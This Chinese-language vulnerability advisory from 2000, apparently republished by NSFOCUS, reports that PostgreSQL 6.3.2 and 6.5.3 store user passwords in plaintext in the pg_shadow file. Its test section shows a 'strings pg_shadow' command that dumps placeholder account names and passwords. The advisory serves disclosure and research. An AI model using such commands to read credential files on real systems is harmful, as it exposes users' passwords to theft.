安全研究
安全漏洞
PostgreSQL 存在密码泄漏问题
发布日期:2000-04-26
更新日期:2000-04-26
受影响系统:
PostgreSQL 6.5.3
PostgreSQL 6.3.2
描述:
PostgreSQL 是一个基于 GNU 的数据库系统。PostgreSQL将密码存放在
一个叫 pg_shadow 的文件中。root 和 PostgreSQL用户可以读取该文件。
不幸的是,口令是以明文方式存在这个文件中,因此任何有读权限的用户
都可获得这些口令,从而导致了口令泄漏。
<* 来源: Meulen <rvdm@cistron.nl> *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
SmellyCat:/var/postgres/data# strings pg_shadow
someaccountname
someaccountpassword
anotheraccountname
anotheraccountpassword
SmellyCat:/var/postgres/data#
建议:
暂无
浏览次数:5937
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障 |
